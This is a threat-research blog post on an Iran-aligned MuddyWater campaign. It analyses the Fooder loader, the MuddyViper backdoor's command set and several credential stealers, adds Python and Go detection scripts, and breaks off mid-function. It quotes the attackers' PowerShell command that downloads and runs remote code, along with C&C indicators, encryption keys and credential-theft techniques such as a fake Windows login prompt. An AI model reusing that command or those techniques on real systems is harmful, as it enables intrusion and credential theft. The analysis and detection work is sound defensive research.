MuddyWater: Snakes by the riverbank

ESET researchers have identified new MuddyWater activity primarily targeting organizations in Israel, with one confirmed target in Egypt. MuddyWater, also known as Mango Sandstorm or TA450, is an Iran-aligned cyberespionage group known for its persistent targeting of government and critical infrastructure sectors, often leveraging custom malware and publicly available tools. In this campaign, the attackers deployed a set of previously undocumented, custom tools with the goal of improving defense evasion and persistence. Among these tools is a custom Fooder loader designed to execute MuddyViper, a C/C++ backdoor. Several versions of Fooder masquerade as the classic Snake game, and its internal logic includes a custom delay function inspired by the game's mechanics, combined with frequent use of Sleep API calls. These features are intended to delay execution and hinder automated analysis. MuddyViper enables the attackers to collect system information, execute files and shell commands, transfer files, and exfiltrate Windows login credentials and browser data. The campaign also leverages credential stealers (CE-Notes and LP-Notes) and reverse tunneling tools (go-socks5), long a favorite of MuddyWater operators.

Although this is our first public blogpost covering MuddyWater, ESET researchers have been tracking the group for several years and have documented its activities in multiple ESET APT Activity Reports. Unlike previous MuddyWater campaigns, which were often noisy and easily detected, the one covered in this blogpost demonstrates a more focused, sophisticated, and subtle approach.

Key points of this blogpost:

  • MuddyWater developers adopted CNG, the next-generation Windows cryptographic API, which is unique to Iran-aligned groups and relatively unusual across the broader threat landscape.
  • The group also used more advanced techniques to deploy MuddyViper, a new backdoor, by using a loader (Fooder) that reflectively loads it into memory and executes it.
  • We provide technical analyses of the tools used in this campaign, including MuddyViper, the Fooder loader, the CE-Notes browser-data stealer, the LP-Notes credential stealer, the Blub browser-data stealer, and go-socks5 reverse tunnels.
  • Throughout this campaign, the operators deliberately avoided hands-on-keyboard interactive sessions, a historically noisy approach often characterized by mistyped commands.

MuddyWater group overview

MuddyWater is a cyberespionage group active since at least 2017, primarily targeting entities in the Middle East and North America. It is one of the most active Iran-aligned APT groups tracked by ESET researchers and has links to the Ministry of Intelligence and National Security of Iran.

The group was first introduced to the public as MuddyWater by Unit 42 in 2017, whose description of the group's activity is consistent with ESET's profiling: a focus on cyberespionage, the use of malicious documents as attachments designed to prompt users to enable macros and bypass security controls, and a primary targeting of entities located in the Middle East.

Notable past activities include Operation Quicksand (2020), a cyberespionage campaign targeting Israeli government entities and telecommunications organizations, which exemplifies the group's evolution from basic phishing tactics to more advanced, multistage operations; and a campaign targeting political groups and organizations in Türkiye, demonstrating the group's geopolitical focus, its ability to adapt social engineering tactics to local contexts, and its reliance on modular malware and flexible C&C infrastructure.

Besides its frequent activity, MuddyWater operations are often noisy. The group is known for its persistent targeting of government, military, telecommunications, and critical infrastructure sectors, typically using custom malware and publicly available tools to gain access, maintain persistence, and exfiltrate sensitive data. In addition to targeting its archenemy, Israel, the group appears to be targeting countries that maintain, or seek to strengthen, diplomatic ties with Iran.

ESET has documented multiple campaigns attributed to MuddyWater that highlight the group's evolving toolset and shifting operational focus. While the earlier operations relied on broad targeting and relatively unsophisticated techniques, more recent campaigns show signs of technical refinement and greater precision.

In March and April 2023, MuddyWater targeted an unidentified victim in Saudi Arabia by deploying a batch script that downloaded a PowerShell-based backdoor, which was used to download and execute arbitrary payloads and subsequently to remove the initial payload from disk.

The group conducted a campaign in January and February 2025 that was notable for its operational overlap with Lyceum (an OilRig subgroup), further detailed in this publication. This latest overlap suggests an evolution in MuddyWater's modus operandi.

The group's publicly documented custom tools include, for example, the Bugsleep, Blackout, Small Sieve, Mori, and POWERSTATS backdoors, as well as custom-compiled variants of open-source tools such as LaZagne or CrackMapExec. MuddyWater campaigns typically don't leverage or introduce new tools, malware, or techniques; instead, they are often noteworthy because of the targeting.

While MuddyWater initially focused strictly on cyberespionage, its cooperation with Lyceum led to targeting of the manufacturing sector through spearphishing. The attack generated substantial noise and achieved little in terms of operational objectives.

The campaign described in this publication reflects what, for MuddyWater, appears to be an unprecedented improvement in toolset and technical execution.

Victimology

As previously mentioned, during this campaign MuddyWater primarily targeted organizations in Israel, but also one in Egypt. Table 1 lists the victims by country and vertical. The campaign started on September 30th, 2024 and concluded on March 18th, 2025.

Table 1. Victims by country and vertical

Country | Vertical
Egypt   | Technology
Israel  | Engineering #1
        | Engineering #2
        | Engineering #3
        | Local Government #1
        | Local Government #2
        | Manufacturing
        | Technology
        | Transportation
        | Utilities
        | University #1
        | University #2
        | University #3
        | Unidentified #1
        | Unidentified #2
        | Unidentified #3
        | Unidentified #4
        | Unidentified #5

One interesting thing to note about the victim in the utilities vertical is that it was also compromised by Lyceum on February 11th, 2025.

Overlap and cooperation with Lyceum

In early 2025, ESET Research identified an operational overlap between MuddyWater and Lyceum, a subgroup of the Iran-aligned OilRig cyberespionage group, also known as HEXANE or Storm-0133. OilRig has been active since at least 2014 and is widely believed to be based in Iran. Tools that we attribute to Lyceum include DanBot, Shark, Milan, Marlin, Solar, Mango, OilForceGTX, and various downloaders that leverage legitimate cloud services for C&C communication. We have previously observed Lyceum targeting multiple Israeli organizations, including national and local governmental entities, as well as organizations in the healthcare sector.

During the campaign covered here, MuddyWater conducted a joint sub-campaign with OilRig in January and February 2025. MuddyWater initiated access through a spearphishing email containing a link to an installer for the Syncro remote monitoring and management (RMM) software. Following the initial compromise, the attackers installed an additional RMM tool, PDQ, and deployed a custom Mimikatz loader disguised as certificate files with .txt file extensions. Based on the observed activity, the harvested credentials were probably used by Lyceum to gain access and assume control of operations within the targeted manufacturing-sector organization in Israel.

This cooperation suggests that MuddyWater may be acting as an initial access broker for other Iran-aligned groups.

Attribution

The victimology, TTPs, and tooling observed in this campaign align with several of the newly documented capabilities and tools that we have previously attributed to MuddyWater. This assessment is based on the initial access method and the subsequent delivery of malicious tools, typically via spearphishing emails that contain links to download RMM software.

TTPs

MuddyWater operators continue to rely on predictable, script-based backdoors written in PowerShell and Go. Their targeting remains focused on the telecommunications, governmental, and oil and energy sectors.

Initial access is typically achieved through spearphishing emails, often containing PDF attachments that link to installers for RMM software hosted on free file-sharing platforms such as OneHub, Egnyte, or Mega. These links lead to the download of RMM tools including Atera, Level, PDQ, and SimpleHelp.

Among the tools deployed by MuddyWater operators is also the VAX-One backdoor, named after the legitimate software that it impersonates: Veeam, AnyDesk, Xerox, and the OneDrive updater service.

The group's continued reliance on this familiar playbook makes its activity relatively easy to detect and block.

Tools overlap

Additionally, we identified code overlaps between several of the newly documented tools and those we previously attributed to MuddyWater:

  • LP-Notes, a new credential stealer, has the same design as CE-Notes, a browser-data stealer that we previously linked to MuddyWater. During this campaign, we also observed a Mimikatz loader that shares the same design and obfuscation methods as CE-Notes.
  • We observed several new variants of MuddyWater's customized go-socks5 reverse tunnels, which the group used throughout 2024 and 2025.
  • In two instances, we observed the customized go-socks5 reverse tunnels embedded in a new MuddyWater loader, internally named Fooder. In a dozen other cases, this loader was used to load MuddyWater's new backdoor, MuddyViper.
  • Interestingly, MuddyViper and the CE-Notes/LP-Notes/Mimikatz loader variants use the CNG API for data encryption and decryption. To the best of our knowledge, this is unique to Iran-aligned groups. Another trait these tools share is that they attempt to steal user credentials by opening a fake Windows Security dialog.

Toolset

In this blogpost, we document previously unknown, custom tools used by MuddyWater:

  • Fooder loader – a newly identified loader that loads the MuddyViper backdoor into memory and executes it. Note that several versions of Fooder masquerade as the classic Snake game, hence the designation MuddyViper. Another notable feature of Fooder is its frequent use of a custom delay function that implements the core logic of the Snake game, combined with Sleep API calls. These features are intended to delay execution in an attempt to hide malicious behavior from automated analysis systems.
  • MuddyViper backdoor – a previously undocumented C/C++ backdoor that enables attackers to collect system information, download and upload files, execute files and shell commands, and steal Windows credentials and browser data.

The rest of the toolset documented in this blogpost includes:

  • CE-Notes, a browser-data stealer,
  • LP-Notes, a credential stealer,
  • Blub, a browser-data stealer, and
  • several go-socks5 reverse tunnels.

Fooder loader

Fooder is a 64-bit C/C++ loader designed to decrypt and then reflectively load the embedded payload (as illustrated in Figure 1), with MuddyViper being the most commonly observed payload.

Figure 1. Relationships between Fooder and its launcher and payload

Fooder appears to be the internal name of this tool, based on its PDB paths:

  • C:\Users\win\Desktop\Fooder\Debug\Launcher.pdb
  • C:\Users\pc\Desktop\main\My_Project\Fooder\x64\Debug\Launcher.pdb

Although we have captured only one sample of it, we believe that Fooder is executed by a simple launcher application, written in C. It has no string obfuscation, verbose logging to the console, and the PDB path left intact:

C:\Users\pc\source\repos\ConsoleApplication7\x64\Release\ConsoleApplication7.pdb

We have observed one instance (SHA-1: 76632910CF67697BF5D7285FAE38BFCF438EC082) of the component launching Fooder. Deployed under the name %USERPROFILE%\Downloads\OsUpdater.exe, the launcher expects a process ID as a command line argument. Once executed, it attempts to duplicate the token of the specified process via the DuplicateTokenEx API, and then uses CreateProcessAsUserA to execute Fooder.

Once executed, Fooder decrypts the embedded payload following these steps:

  • The command line argument (6) is added to each byte of a hardcoded key, which produces the AES decryption key, shared across all samples: 6969697820511281801712341067111416133321394945138510872296106446.
  • A hardcoded value (5) is subtracted from each byte of the hardcoded payload.
  • Finally, the hardcoded payload is decrypted using the WinCrypt API and the AES key.

Fooder then loads the payload directly into memory using reflective techniques, allowing it to execute without relying on standard system calls or writing to disk.

Once launched in this manner, Fooder has been used to deliver not only MuddyViper but also HackBrowserData, an open-source tool capable of decrypting and exporting sensitive browser information such as credentials and cookies. Fooder also facilitates the deployment of go-socks5 variants, which are Go-compiled binaries that function as reverse tunnels, enabling attackers to bypass firewalls and Network Address Translation (NAT) mechanisms. Notably, the MuddyWater group has previously used go-socks5 independently of Fooder, indicating a continued reliance on this tool for stealthy network communication and data exfiltration.

Note that several versions of Fooder masquerade as the Snake game (see the strings and mutexes highlighted in Figure 2), which is reflected in the name of its most commonly embedded payload, MuddyViper.

Figure 2. Multiple Fooder instances masquerade as the Snake game

Another notable feature of Fooder is its frequent use of a custom delay function (which implements the core logic of the Snake game, where the player maneuvers the head of a growing line, often themed as a snake, to avoid obstacles and collect items) and of Sleep API calls. The delay in execution is achieved by mimicking the loop-based delay function: as in the Snake game, each movement is controlled by a loop that waits for a short period before updating the game. The loop introduces execution delays that slow down the malware's behavior, helping it to evade tools that monitor for rapid malicious activity. Figure 3 highlights the delays and the Snake game welcome banner presented to the user at runtime.

Figure 3. Various calls to delay execution are dispersed throughout Fooder's code

Fooder does not have any built-in persistence capability. However, in cases when Fooder's final payload is the MuddyViper backdoor, the backdoor can set up persistence for the loader via a scheduled task or the Startup folder.

MuddyViper backdoor

MuddyViper, a previously undocumented backdoor written in C and C++, enables covert access to and control over compromised systems. We have observed MuddyViper only in memory, loaded by Fooder, which might be the reason there is no obfuscation or string encryption. As is typical for MuddyWater, MuddyViper sends extremely verbose and frequent status messages to its C&C server throughout its execution, such as the following:

  • [+] Persist: ——————– Hello,I'm Alive ——————–
  • [+] Persist: ——————– Hello,First Time ——————–
  • [-] Persist: failed Create task !!!!

The backdoor also keeps a lengthy list of 150+ process names and information about the respective products in order to send detailed reports about the security tools detected in the compromised environment, although adding the details could easily have been done on the server side:

  • [>] Process: aciseagent.exe ~~> (Cisco Umbrella Roaming Security) –> (Security DNS) found!
  • [>] Process: acnamagent.exe ~~> (Absolute Persistence) –> (Asset Management) found!
  • [>] Process: acnamlogonagent.exe ~~> (Absolute Persistence) –> (Asset Management) found!

This behavior results in considerable network traffic.

MuddyViper has two methods of establishing persistence:

  • A scheduled task named ManageOnDriveUpdater can launch MuddyViper from its installation path on every system start.
  • An entry in the Windows Startup folder (the persistence that command ID 900 clears).

MuddyViper supports 20 backdoor commands (see Table 2 for details of all of them), notably including the ability to open and operate reverse shells; download, upload, and execute files; report the running security tools; steal user credentials and data from various browsers; set up its own persistence; and uninstall itself.

Table 2. MuddyViper backdoor commands

ID | Arguments | Action | Response
200 | N/A | N/A | 0, via the GET /adad or GET /aq36 request, to obtain a backdoor command.
207 | N/A | Decrypts the embedded HackBrowserData tool and reflectively loads it in a new thread. This open-source tool can steal credentials, history, and other information from web browsers. MuddyViper then compresses the collected data (into a file named CacheDump.zip) and uploads it to the C&C server. | Collected browser data, via the GET /mq65 request. In case of an error, a custom status message is sent instead.
300, 301, 302 | Command line (300 only); N/A for 301 and 302 | Launches a reverse shell using: the supplied command line (command ID 300); C:\windows\system32\cmd.exe (command ID 301); or C:\windows\system32\WindowsPowerShell\v1.0\Powershell.exe (command ID 302). Then, in a loop, uploads the process output to the C&C server and interprets the server response (see command IDs 350-352) until interrupted. | Process output, via the GET /oi32 request. In case of an error, a custom status message is sent instead.
350 | N/A | Must follow command IDs 300-302. Sleeps for a preconfigured amount of time; for the reverse shell loop, the default is one second. | N/A
351 | Sleep time (in milliseconds) | Must follow command IDs 300-302. Configures the sleep time for the reverse shell loop; the default is one second. | N/A
352 | Input for the reverse shell | Must follow command IDs 300-302. Passes the supplied argument to the running reverse shell. | N/A
360 | N/A | Not implemented, probably related to the reverse shell API. | A custom error message: [-] Agent does not have an active pipe
400 | Flag | Must follow command ID 401. Confirms that the C&C server has successfully received part of the exfiltrated local file. Optionally adjusts the sleep before the next upload specified in command ID 401 to ten seconds. | No response, unless this command is issued outside of a pending file upload process, in which case it sends a custom error message: [-] Agent does not have an DOWNLOAD file
401 | Sleep time (in milliseconds), filename | Initiates a file upload operation from the specified local file to the C&C server in chunks, with the specified sleep time between each upload. | Contents of the specified file, via a series of GET /dadw requests.
500 | Data chunk | Must follow command ID 501. Writes the received data chunk into a previously created and opened local file. | A custom error message, if the operation fails.
501 | Sleep time (in milliseconds), filename | Downloads a file from the C&C server in chunks into a local file with the specified name. The specified sleep time is used as a delay after downloading each data chunk. Deletes the file if the connection can't be established after six consecutive attempts. | A series of GET /dadwqa requests, to request the file contents.
700 | Sleep time (in milliseconds) | Configures the sleep time between connection attempts to the specified value (default is 60 seconds). | N/A
800 | N/A | Enumerates running processes, looking for selected security tools from an extensive hardcoded list. | For each detected process, sends a report with the following information, populated from that hardcoded table: [>] Process: ~~> () –> () found!
805 | Timeout (in milliseconds) | Displays a fake Windows Security dialog (see Figure 4), prompting the user to fill in credentials, which are then exfiltrated to the C&C server. Uses the supplied argument as a timeout for the dialog. | Collected credentials, via the GET /rq13 request: [+] creds ~~> Username: ~~> Password: If not successful, a custom error message is sent instead.
806 | N/A | Sets up persistence via a scheduled task named ManageOnDriveUpdater. The backdoor copies itself to its installation path, unless it is already running from there. | A custom status message, depending on the result of the operation.
900 | N/A | Uninstalls itself. First clears persistence set via the Windows Startup folder and then deletes itself. Note that this action will not clear the persistence via a scheduled task that may be set by backdoor command ID 806. | A custom status message, depending on the result of the operation.
905 | N/A | Terminates the current backdoor process. | N/A
906 | N/A | Relaunches itself (via the CreateProcessW API) and terminates the current process. | A custom status message, depending on the result of the operation.
other | N/A | N/A | [-] Agent statusCode I do not have it

One of the commands listed in Table 2, with ID 805, displays a fake Windows Security dialog in an attempt to lure the victim into filling in their Windows credentials, as seen in Figure 4. A similar technique is used by MuddyWater's LP-Notes stealer (see LP-Notes credential stealer).

Figure 4. Fake Windows Security dialog displayed by MuddyViper (command ID 805)

Another command, with ID 900, aims to remove MuddyViper from the compromised machine and clear its persistence; however, the command does not remove all traces of the backdoor.

Network protocol

To communicate with its C&C server, MuddyViper uses HTTP GET requests (via the WinHTTP API) over port 443, with the WINHTTP_FLAG_SECURE flag configured to use SSL/TLS. Two C&C servers were observed: processplanet[.]org and 35.175.224[.]64.

Both directions of communication AES-CBC encrypt the data, using the CNG API with the key (used across samples) 0608101047106453101617106423101013101012101083109710108585106969 and the IV 0.

In the backdoor → server direction of the communications:

  • Each endpoint URI supported by the C&C server is used by the backdoor for a specific type of request, such as requesting a command, uploading a file, or sending a custom status message.
  • Additional data for the C&C server is included in the HTTP request body, which is unconventional for HTTP GET requests.
  • The User-Agent string is A WinHTTP Example Program/1.0, a remnant of the example code for the WinHttpOpen API.
  • The connection, send, receive, and response timeouts are set to 30 seconds.
  • The default sleep time between consecutive connection attempts is 60 seconds. This value can be configured by command ID 700.
  • Upon failure, connection attempts are retried up to 10 times.
  • Prior to encryption, the data is always formatted as /*.

In the server → backdoor direction of the communications:

  • The HTTP status code determines the backdoor command ID.
  • The backdoor command arguments are included in the HTTP response body.
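As an added example (not code from ESET or from the original post), the following Python triage helper scans web-proxy log lines for the MuddyViper traffic traits listed above: the observed C&C hosts, the leftover WinHttpOpen sample User-Agent, GET requests that carry a body, the fixed endpoint URIs, and response status codes outside the valid HTTP range that the server uses as command IDs. The log format, the field names, and the sample lines are assumptions constructed for the example.

```python
"""Triage helper for the MuddyViper C&C traits described in the post.

Added example; not ESET's code.  Assumed (constructed) log line format:
    <ts> <src_ip> <method> <host> <uri> <status> <req_bytes> "<user_agent>"
"""
import re
from dataclasses import dataclass, field

# Indicators taken from the post; hosts are written without the [.] defanging.
KNOWN_C2_HOSTS = {"processplanet.org", "35.175.224.64"}
MUDDYVIPER_USER_AGENT = "A WinHTTP Example Program/1.0"
MUDDYVIPER_URIS = {"/adad", "/aq36", "/mq65", "/oi32", "/dadw", "/dadwqa", "/rq13"}

LOG_RE = re.compile(
    r'^(?P<ts>\S+) (?P<src>\S+) (?P<method>[A-Z]+) (?P<host>\S+) '
    r'(?P<uri>\S+) (?P<status>\d{3}) (?P<req_bytes>\d+) "(?P<ua>[^"]*)"$'
)


@dataclass
class Hit:
    line_no: int
    src: str
    host: str
    status: int
    reasons: list = field(default_factory=list)


def analyze_line(line_no, line):
    """Return a Hit when the line shows at least two MuddyViper traits, else None.

    A single weak trait (a GET with a body, an odd status code) is not enough on
    its own; requiring two traits keeps false positives down on real proxy logs.
    """
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    f = m.groupdict()
    status = int(f["status"])
    reasons = []
    if f["host"] in KNOWN_C2_HOSTS:
        reasons.append("known MuddyViper C&C host")
    if f["ua"] == MUDDYVIPER_USER_AGENT:
        reasons.append("WinHttpOpen sample User-Agent")
    if f["method"] == "GET" and int(f["req_bytes"]) > 0:
        reasons.append("GET request carrying a body")
    if f["uri"] in MUDDYVIPER_URIS:
        reasons.append("MuddyViper endpoint URI")
    # HTTP status codes are only defined in the range 100-599; MuddyViper's
    # server answers with the command ID instead (for example 805, 900, 906).
    if not 100 <= status <= 599:
        reasons.append("status code outside HTTP range used as command ID")
    if len(reasons) < 2:
        return None
    return Hit(line_no, f["src"], f["host"], status, reasons)


def scan(lines):
    """Run analyze_line over an iterable of log lines and collect the hits."""
    hits = []
    for n, line in enumerate(lines, 1):
        hit = analyze_line(n, line)
        if hit:
            hits.append(hit)
    return hits


# Constructed sample log lines (not real traffic); the last one is benign.
SAMPLE_LOG = [
    '2025-01-14T09:12:03Z 10.0.4.21 GET processplanet.org /adad 805 96 "A WinHTTP Example Program/1.0"',
    '2025-01-14T09:12:04Z 10.0.4.21 GET processplanet.org /rq13 200 320 "A WinHTTP Example Program/1.0"',
    '2025-01-14T09:13:10Z 10.0.4.37 GET 35.175.224.64 /oi32 352 144 "A WinHTTP Example Program/1.0"',
    '2025-01-14T09:13:11Z 10.0.4.50 GET example.com /index.html 200 0 "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(f"line {hit.line_no}: {hit.src} -> {hit.host} (status {hit.status})")
        for reason in hit.reasons:
            print(f"    - {reason}")
```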

CE-Notes browser-data stealer

CE-Notes is a browser-data stealer that we named after the filename, ce-notes.txt, used to stage stolen data on disk. We discovered CE-Notes in 2024 when we observed MuddyWater deploying EXE and DLL versions of it on the system of an organization in Israel.

CE-Notes was downloaded with the following PowerShell command:

"C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" (Invoke-WebRequest -UseDefaultCredentials -UseBasicParsing -Uri http://206.71.149[.]51:443/57576?filter_relational_operator_2=60169).content | Invoke-Expression

Both versions of the browser-data stealer attempt to steal and decrypt the app-bound encryption key stored in the Local State file (%APPDATA%\Local\Google\Chrome\User Data\Local State) of Chromium browsers (Chrome, Brave, and Edge). App-bound encryption was introduced in Chrome version 127, enabling Chrome to encrypt data tied to app identity. Cybercriminals and APT groups have caught on and are actively trying to work around app-bound encryption to steal session keys. CE-Notes is quite similar to ChromElevator on GitHub.

The collected data is AES-CBC encrypted using the CNG API with the key 9262A37DF166AC1D5F582AAC79F54CCB47623BFD9BA001228D284AE13A08F52F and the IV 4103A09887B82FFD56A93BB431805224.

The encrypted data is then stored on disk in C:\Users\Public\Downloads\ce-notes.txt for later retrieval (probably via an RMM tool, since neither the EXE nor the DLL version has any means of exfiltrating the file). The main difference between the EXE and the DLL is the virtual machine evasion functionality added to the DLL.

We observed the CE-Notes browser-data stealer in the following locations:

  • C:\system2.dll
  • C:\Users\Public\Downloads\system2.dll
  • C:\Intel\system.dll
  • C:\20240926_165509.exe

LP-Notes credential stealer

LP-Notes is a C/C++ Windows credential stealer with the same design as the CE-Notes browser-data stealer. Following the same naming convention as for CE-Notes, we named the stealer LP-Notes based on the local file it uses to stage stolen credentials before exfiltration: C:\Users\Public\Downloads\lp-notes.txt (vs. C:\Users\Public\Downloads\ce-notes.txt). The sole purpose of LP-Notes is to lure victims into submitting their credentials by displaying a fake Windows Security dialog, prompting them to enter their Windows username and password. We have observed an instance of LP-Notes being downloaded and executed by PowerShell with a command line very similar to the one shown in the CE-Notes section.

Initialization

On execution, LP-Notes starts by looking for a process named taskhostw.exe (Host Process for Windows Tasks) and then impersonating the security context of that process (via the ImpersonateLoggedOnUser API); only then does LP-Notes activate its malicious payload.

LP-Notes employs several simple obfuscation techniques, including a custom, addition-based routine for string decryption. Figure 5 shows the function that decrypts strings of lengths ranging from 15 to 19 characters, though the decryption key is always the same: a set of predefined constants that are added to or subtracted from each byte of the string. Interestingly, CE-Notes uses the same decryption routine, except for a different decryption key, as shown in Figure 6.

Figure 5. LP-Notes string decryption routine
Figure 6. CE-Notes string decryption routine, similar to that of LP-Notes

LP-Notes uses string stacking for strings shorter than 15 or longer than 19 characters, including the decryption key, IV, and import names. Finally, to obscure the use of Windows API functions and to make static analysis more difficult, LP-Notes dynamically resolves the API functions during the C runtime startup, prior to the execution of the WinMain function (the standard entry point for a graphical Windows-based application according to Microsoft), thus hiding direct references to the API functions from the pseudocode view (see Figure 7).

Figure 7. LP-Notes WinMain function with obfuscated import names (left) vs. deobfuscated view (right)

Capabilities

In an endless loop, LP-Notes displays a fake Windows Security dialog prompting the victim to enter their Windows username and password, as shown in Figure 8 (via the CredUIPromptForWindowsCredentialsW API). Note that although similar, this is not the same as the fake credential prompt used by MuddyViper (see Figure 4). It immediately verifies the validity of any submitted credentials by attempting to log on as that user (via the CredUnPackAuthenticationBufferW and LogonUserW APIs).

Figure 8. A fake Windows Security dialog displayed by LP-Notes

If successful, the harvested credentials are then AES-CBC encrypted using the CNG API with the key ED15C8344B45DAED1E0578F8BC1A32411812C61F4CB45D89B107287DE0E09FFC and the IV 91A4E6F6D51DAEE773A8F00279792578.

Similar to CE-Notes, LP-Notes then stores the encrypted credentials in a local file, in this case C:\Users\Public\Downloads\lp-notes.txt. As neither of these components has the capability to exfiltrate data, another component most likely handles this (either an RMM tool or MuddyViper).

Blub browser-data stealer

Blub is a C/C++ browser-data stealer incorporating a statically linked SQLite library. The name is derived from its filename, Blub.exe. We observed the PDB path C:\Users\jojo\source\repos\stealer\x64\Release\stealer.pdb. It steals user login data from the Google Chrome, Microsoft Edge, Mozilla Firefox, and Opera web browsers.

Chromium-based browsers

For Chrome, Blub first terminates chrome.exe (if running) and then parses and decrypts the encryption key from C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Local State. This key is used to encrypt sensitive data stored by Chrome, such as passwords or cookies, and it is protected by the Data Protection API (DPAPI) so that it can only be decrypted on the system where it was originally encrypted. Blub decrypts this key via the CryptUnprotectData API, and then uses it to decrypt user credentials obtained from all existing Chrome user profiles on the compromised computer. The credentials, stored in C:\Users\<username>\AppData\Local\Google\Chrome\User Data\Login Data, are obtained via the following SQL query:

SELECT origin_url, username_value, password_value FROM logins

A similar sequence of steps is used to obtain and decrypt user credentials from Microsoft Edge and Opera user profiles, using the key obtained from C:\Users\<username>\AppData\Local\Microsoft\Edge\User Data\Local State and C:\Users\<username>\AppData\Roaming\Opera Software\Opera Stable\Local State, respectively.

Firefox

Finally, to decrypt stored user credentials for Mozilla Firefox, Blub parses the hostname, encryptedUsername, and encryptedPassword values from the logins.json file in each user's profile directory, i.e., the roaming AppData folder %APPDATA%\Mozilla\Firefox\Profiles. The credentials are then decrypted using the PK11SDR_Decrypt function from the nss3.dll library used by Firefox.

The collected data is stored in a local file named file.txt, without encryption. The same data is logged to the console, without encryption, along with verbose status messages. Blub has no capability to exfiltrate this file.

Note that Blub checks for running processes associated with security solutions before executing its malicious payload, focusing on the combination of the afwServ.exe (Avast firewall) and AvastSvc.exe (Avast antivirus) processes. If afwServ.exe is detected running (but not AvastSvc.exe), Blub concludes that Norton (which now uses the Avast engine) is running on the compromised host, and exits. If AvastSvc.exe (Avast) is detected, Blub continues with the execution, except that it skips stealing credentials from Microsoft Edge.

While Blub's strings are stored in cleartext, a simple obfuscation technique is used for strings associated with the Google Chrome data stealer functionality. Specifically, multiple strings are concatenated into one long string, with 16 random characters between them, apparently to hide them from view during static analysis:

gdGlog}o{eRwjpw&"encrypted_key":FAe[b-vcJvxGImpersonateLoggehgdOvlgt_NxuoolOpenProcessTokenVLUKKW'xxqjpwe}uDuplicateTokenExs5&}vlion2(sh|y⌂ryme~ds~

Removing the junk characters and splitting the strings returns:

  • "encrypted_key":
  • ImpersonateLogge
  • OpenProcessToken
  • DuplicateTokenEx

go‑socks5 reverse tunnels

MuddyWater’s go‑socks5 reverse tunnels are a collection of Go-compiled tools, based on publicly available libraries such as go‑socks5, yamux, and resocks; they have been frequently used in MuddyWater’s recent campaigns.

Most of the variants we analyzed appear to be internally named ESETGO (no relation to ESET), based on the build configuration strings shown in Figure 9 and in other artifacts.

path  ESETGO
mod   ESETGO	(devel)
dep   github.com/armon/go-socks5	v0.0.0-20160902184237-e75332964ef5h1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=
dep	  github.com/hashicorp/yamux	v0.1.1	h1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=
dep	  golang.org/x/net	v0.29.0	h1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=
dep	  golang.org/x/sys	v0.25.0	h1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=
build -buildmode=exe
build -compiler=gc
build -ldflags="-w -s"
build CGO_ENABLED=1
build CGO_CFLAGS=
build CGO_CPPFLAGS=
build CGO_CXXFLAGS=
build CGO_LDFLAGS=
build GOARCH=amd64
build GOOS=windows
build GOAMD64=v1

Figure 9. Build configuration strings from MuddyWater’s go‑socks5 variants
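Because the ESETGO module path and the go‑socks5 and yamux dependencies are embedded in the binary as Go build info, they can be used to triage suspect Go executables. The program below is an added example, not ESET's or the project's code: it parses build info in the textual form of Figure 9 with the standard library's runtime/debug.ParseBuildInfo and reads it from a binary on disk with debug/buildinfo.ReadFile. The embedded Figure 9 text has its tab separators restored and omits the empty CGO_*FLAGS lines; the benign build info used for comparison is constructed here, and the decision rule (the ESETGO name alone, or both tunnel libraries together) is a triage heuristic chosen for this example, not a detection ESET describes.

```go
package main

import (
	"debug/buildinfo"
	"fmt"
	"os"
	"runtime/debug"
	"strings"
)

// figure9BuildInfo reproduces the build configuration of Figure 9 in the
// tab-separated layout Go embeds in binaries (module paths, versions and
// h1: hashes as printed in the figure; empty CGO_*FLAGS lines omitted).
const figure9BuildInfo = "path\tESETGO\n" +
	"mod\tESETGO\t(devel)\t\n" +
	"dep\tgithub.com/armon/go-socks5\tv0.0.0-20160902184237-e75332964ef5\th1:0CwZNZbxp69SHPdPJAN/hZIm0C4OItdklCFmMRWYpio=\n" +
	"dep\tgithub.com/hashicorp/yamux\tv0.1.1\th1:yrQxtgseBDrq9Y652vSRDvsKCJKOUD+GzTS4Y0Y8pvE=\n" +
	"dep\tgolang.org/x/net\tv0.29.0\th1:5ORfpBpCs4HzDYoodCDBbwHzdR5UrLBZ3sOnUJmFoHo=\n" +
	"dep\tgolang.org/x/sys\tv0.25.0\th1:r+8e+loiHxRqhXVl6ML1nO3l1+oFoWbnlu2Ehimmi34=\n" +
	"build\t-buildmode=exe\n" +
	"build\t-compiler=gc\n" +
	"build\t-ldflags=\"-w -s\"\n" +
	"build\tCGO_ENABLED=1\n" +
	"build\tGOARCH=amd64\n" +
	"build\tGOOS=windows\n" +
	"build\tGOAMD64=v1\n"

// Finding is one matched indicator with a short explanation.
type Finding struct {
	Indicator string
	Detail    string
}

// tunnelLibraries are the public libraries named above as the basis of
// MuddyWater's reverse tunnels. Legitimate software uses them too, so a
// hit is a triage signal, not a verdict on its own.
var tunnelLibraries = map[string]string{
	"github.com/armon/go-socks5": "SOCKS5 server library",
	"github.com/hashicorp/yamux": "stream multiplexer used by resocks-style tunnels",
}

// Triage checks parsed Go build info for the indicators seen in Figure 9.
func Triage(bi *debug.BuildInfo) []Finding {
	var findings []Finding
	if bi.Main.Path == "ESETGO" || bi.Path == "ESETGO" {
		findings = append(findings, Finding{"module-name", "main module named ESETGO (no relation to ESET)"})
	}
	for _, dep := range bi.Deps {
		if why, ok := tunnelLibraries[dep.Path]; ok {
			findings = append(findings, Finding{"dependency", dep.Path + " (" + why + ")"})
		}
	}
	settings := make(map[string]string, len(bi.Settings))
	for _, s := range bi.Settings {
		settings[s.Key] = s.Value
	}
	hasS, hasW := false, false
	for _, flag := range strings.Fields(settings["-ldflags"]) {
		hasS = hasS || flag == "-s"
		hasW = hasW || flag == "-w"
	}
	if hasS && hasW {
		findings = append(findings, Finding{"stripped", "symbol table and DWARF removed via -ldflags=" + settings["-ldflags"]})
	}
	return findings
}

// LikelyReverseTunnel applies the heuristic chosen for this example: the
// ESETGO module name alone, or both tunnel libraries together, escalates.
func LikelyReverseTunnel(findings []Finding) bool {
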